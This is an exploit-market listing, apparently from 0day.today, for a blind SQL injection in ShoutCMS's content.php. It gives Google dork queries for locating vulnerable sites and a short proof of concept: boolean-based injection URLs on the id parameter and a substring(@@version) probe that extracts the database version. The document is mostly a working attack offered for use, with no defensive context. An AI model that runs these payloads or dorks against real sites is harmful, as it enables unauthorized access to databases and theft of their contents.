[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ShoutCMS (content.php) Blind Sql Injection Vulnerability

Author
Zero Cold
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10751
Category
web applications
Date add
01-02-2010
Platform
unsorted
========================================================
ShoutCMS (content.php) Blind Sql Injection Vulnerability
========================================================

.:. Script         : Shout! Script
 
.:. Vendor         : http://www.mediashaker.com/index.php
 
.:. Bug Type       : Blind Sql Injection
 
.:. Dork           : [1] "Powered by Shout!"
                     [2] intitle:"Shout" inurl:"admindex.php"
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/content.php?id=54+and+1=1       >>> True
www.site.com/content.php?id=54+and+1=2       >>> False
 
 
www.site.com/content.php?id=54+and substring(@@version,1,1)=4  >>> True
www.site.com/content.php?id=54+and substring(@@version,1,1)=5  >>> False



#  0day.today [2024-12-26]  #